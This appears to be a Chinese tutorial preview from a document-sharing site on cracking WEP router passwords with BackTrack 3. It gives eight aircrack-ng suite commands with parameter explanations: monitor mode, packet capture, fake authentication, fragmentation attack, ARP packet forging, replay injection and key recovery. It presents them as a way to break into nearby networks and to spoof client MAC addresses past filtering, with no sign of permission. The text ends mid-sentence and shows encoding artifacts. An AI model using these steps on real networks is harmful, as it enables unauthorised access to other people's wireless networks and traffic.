無線路由器密碼破解(帶圖)_第1頁
無線路由器密碼破解(帶圖)_第2頁
無線路由器密碼破解(帶圖)_第3頁
無線路由器密碼破解(帶圖)_第4頁
無線路由器密碼破解(帶圖)_第5頁
已閱讀5頁,還剩5頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、本來自己以前也是沒有破解過無線網(wǎng)絡(luò)密碼的, 只是在論壇里呆久了看的文章也多了,所以也想來玩下破解無線密碼。 并且看看到壇子里面有很多朋友都不知破解如何下手,沒有詳細(xì)的圖文教程對新手來說確實(shí)有點(diǎn)困難。所以花了些時(shí)間來做這個(gè)教程。電腦配置 :asus 845/P4 1.8G/512M/40G無線網(wǎng)卡 :TP-LINK WN321G(USB)無線 AP:NETGEAR WG602 V3系統(tǒng): BT3(用的是光盤啟動(dòng))下載:現(xiàn)在要做的是查看有哪些無線網(wǎng)絡(luò)可以使用或破解的,用 BT3 光盤啟動(dòng)進(jìn)入 xwindows, 點(diǎn)擊左下角菜單 -Internet-Wireless Assistant如下圖。 wi

2、ndows 下查看方式就不提了,地球人都知道。很多菜鳥連打開一個(gè)Shell都不會(huì),那就看下面這張圖后總會(huì)了吧!八條命令完成破解過程1、ifconfig -a查看無線網(wǎng)卡名字及 MAC地址記錄下來。 如下面 rausb0,TP-LINK WN321G就是這個(gè)了。如果是 Athose 的無線網(wǎng)卡顯示的就是 ath1 ,有的無線網(wǎng)卡是 eth1 就不一一介紹了。rausb0 (如果你是如果沒看到有無線網(wǎng)卡,可以使用iwconfig命令,查看是否有加載。如下圖:2、airmon-ng start rausb0 6這個(gè)命令用于將自己的無線網(wǎng)卡置于監(jiān)控模式,即類似一個(gè) AP的效果,因此可以有抓別人包的功能

3、。其中 rausb0 是無線網(wǎng)卡名字的 ,在第一個(gè) ifconfig -a 命令可以看得到。 rausb0 后面的那個(gè) 6 是需要破解的 AP的頻道,可以在最前面的圖上看到, 或者是在 windows 下先把要破解對象的相關(guān)信息抄下來。運(yùn)行命令成功以后,你會(huì)看到返回的提示顯示出現(xiàn)一個(gè)TP-LINK WN321G無線網(wǎng)卡的話就是這個(gè),其他的可能不同,不過一般都是XXX1)如下圖:3、airodump-ng -ivs -w pack -c 6 rausb0這個(gè)命令會(huì)列出所有該頻道的AP。其中, 6 是指你需要監(jiān)控的頻道,必須和第二個(gè)命令里的一樣,第二步出現(xiàn)的網(wǎng)卡名字。這個(gè)命令運(yùn)行以后,顯示的內(nèi)容比

4、較多,簡單介紹一下:BSSID :是 AP的 Mac 地址PWR: AP 信號的大小,如果低于10,丟包情況嚴(yán)重,比較難破解rausb0是剛才RXQ: 干擾的大小Beacons:發(fā)送接受的包,參考信息,在跳說明有數(shù)據(jù)#Data: 這個(gè)比較重要, 是接受到可以用來破解的特殊包, 如果一直不變,那么,說明沒有客戶端連接, 破解可能很麻煩, 如果對方有大文件在下載, 那么這個(gè)跳的速度非??欤瑤追昼娋涂梢杂凶銐虻陌鼇砥平饬?,如果跳得很慢,那么,就需要用注入的方式來獲取包了。CH:頻道MB:網(wǎng)絡(luò)連接速度54 就是 54MBENC, CIPHER, AUTH這些是加密方式,我們這次只討論顯示為WEP如果顯

5、示 WPA TKIP 啥的,只能密碼窮舉破解,個(gè)人認(rèn)為希望不大。ESSID: 這個(gè)是 AP的名字,需要用到的。 如果是中文的話可以下載一個(gè)中文包,下載地址過一會(huì)兒,下面會(huì)顯示哪些客戶端連接到了哪些 AP,針對有些 Mac地址加密的,很容易模擬對方客戶端的 Mac從而騙進(jìn)去,所以不要簡單地相信 Mac限制功能。這個(gè)窗口就開著好了,不用關(guān)閉,以后的命令,需要重新打開一個(gè)終端窗口 (shell) 操作。4、aireplay-ng -1 0 -e ap_essid -a ap_mac -h pc_mac rausb0這一步開始,我們要做一些真正的破解工作,主要是針對那些客戶端僅僅連接,沒什么流量的 A

6、P,這種 AP, #Data 的增長非常慢,往往需要很長的時(shí)間才有可能取得足夠的包(一般 5 位的密碼需要 10000 個(gè)包左右,更多的密碼就要更多的。)這個(gè)時(shí)候就需要 aireplay-ng出面了,顧名思義,這個(gè)軟件就是Replay ,也就是說,模擬發(fā)包。首先解釋命令:-e ap_essid 就是 -e之后加上你需要破解的 ESSID,比如 TP-LINK ,linksys,注意大小寫。-a ap_mac 就是 -a之后加上你需要破解的AP的 Mac地址,上面的圖就可以看得到 BSSID。-h pc_mac 就是 -h之后,加上你的無線網(wǎng)卡的 Mac 地址, 在第一步你可以得到。rausb0

7、 ,上面解釋過了。舉個(gè)例子:aireplay-ng -1 0 -e Tp-link -a 6 -h 8 rausb0這一條命令,是用欺騙的方式,連接上那個(gè)AP,因此,如果網(wǎng)絡(luò)信號不好,可能會(huì)執(zhí)行不成功。如果成功了,那么會(huì)顯示 Successful :-字樣。如下圖。否則,讓信號強(qiáng)度大于 10。5、aireplay-ng -5 -b ap_mac -h pc_mac rausb0上一條成功以后, 我們需要開始收集那些需要的數(shù)據(jù)包, 才能夠進(jìn)行模擬, 并且破解。所謂的需要的數(shù)據(jù)包,就是 #Data 的數(shù)據(jù),如果 #Data 一直是 0,那么可能會(huì)很麻煩,最好的情況是 #Data 緩慢增長的這種情況

8、。解釋一下-b ap_mac 就是你需要破解的AP的 Mac 地址。-h pc_mac 就是你自己網(wǎng)卡的Mac地址。rausb0 就是你自己網(wǎng)卡名字同上面一樣。這一條命令的執(zhí)行,和 #data 包有關(guān),如果 #Data 沒有增加,則這個(gè)命令會(huì)一直執(zhí)行,直到捕獲一個(gè) #Data 包。捕獲以后,程序會(huì)問你是否需要用這個(gè)包來模擬攻擊?;卮餣 即可。如果攻擊成功,則會(huì)顯示成功,失敗往往是因?yàn)樾盘柼钤斐傻模?如果攻擊失?。ㄍ遣东@的包有問題),程序重試 N次以后,或自動(dòng)重新開始捕捉包,繼續(xù)進(jìn)行即可。等成功完成以后,會(huì)顯示一個(gè)文件名: fragment-XXXXX-XXXXXX.xor 這個(gè)文件名,

9、XXXXX里面是數(shù)字,是一個(gè)文件。下一部會(huì)用得到。這一步是最有可能失敗的一步,盡量保持信號好一點(diǎn)。6、packetforge-ng -0 -a ap_mac -h pc_mac -k 255.255.255.255 -l255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp第六步,參數(shù)比較多,解釋一下:-a ap_mac 是待破解的 AP的 Mac地址,-h pc_mac 是你自己的無線網(wǎng)卡Mac地址fragment-XXXXX-XXXXXX.xor 就是上一步顯示的那個(gè)文件名。這一步會(huì)很快做完,顯示生成文件到mrarp 啥的,其實(shí)就是破解包

10、的準(zhǔn)備過程。如下圖。對了這里的 -l 是字母不是數(shù)字1。7、aireplay-ng -2 -r mrarp -x 256 rausb0這一步?jīng)]哈可以修改的,參數(shù)解釋一下rausb0 是 你的無線網(wǎng)卡的名字256 是攻擊速度, 1024 是最大值,個(gè)人建議設(shè)為256 ,或 128 這樣不容易死掉。這一步執(zhí)行后, 你會(huì)看到第一個(gè)終端窗口 (shell) 里面,你破解的那個(gè) AP后面的 #Data 在飛速增長,我們只需等待十幾秒數(shù)據(jù)包就沖到 5 位數(shù)字以上了。如果第一個(gè)終端窗口 (shell) 里面的 #Data 沒有在飛速增長的話那就是你操作時(shí)出了錯(cuò)誤。8、我們可以新打開一個(gè)終端窗口, 當(dāng) #Da

11、ta 達(dá)到 10000 個(gè)的時(shí)候,就可以測試破解了,很多密碼都可以 10000 左右 #Data 就算出來新窗口中運(yùn)行:aircrack-ng -n 64 -b ap_mac pack-01.ivs解釋一下,64 AP 使用的是 64 位加密,如果是 128 的話把 64 改成 128 -b ap_mac 對方 AP的 Mac地址pack-01.ivs 其實(shí)是第三步自動(dòng)生成的一個(gè)文件, 如果你多次運(yùn)行了第三步,那么,可能會(huì)生成多個(gè) pack-XX.ivs 文件, 你可以到對應(yīng)的文件夾里看一下 (就在桌面上的第一個(gè)文件夾圖標(biāo)里),找到 XX最大的那個(gè),就是你當(dāng)前正在使用的這個(gè)文件。運(yùn)行以后,如果運(yùn)氣好,一般 10000 個(gè)#Data 就可以破解出來密碼,同時(shí)會(huì)顯示對應(yīng)的 Ascii 碼,如果不是標(biāo)準(zhǔn) Ascii 碼就是一串?dāng)?shù)字,記錄下來,搞事實(shí)上。運(yùn)氣不好的情況,程序繼續(xù)等待更多的 #Data,再重新計(jì)算一次密碼。破解體會(huì):只要有恒心,破解不是夢。在破解過程中遇到些問題和大伙說說。1、開始用的在 VMwareV5.5.2 虛擬機(jī) 中文綠色版下用 BT3 破解,第二次使用時(shí)找不到 USB網(wǎng)卡。這時(shí)需要先運(yùn)行“啟動(dòng)服務(wù) .cmd”啟動(dòng) -USB和 COM服務(wù)。再開虛擬機(jī)才又找得到 USB網(wǎng)卡。2、發(fā)現(xiàn)在 VMwareV

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論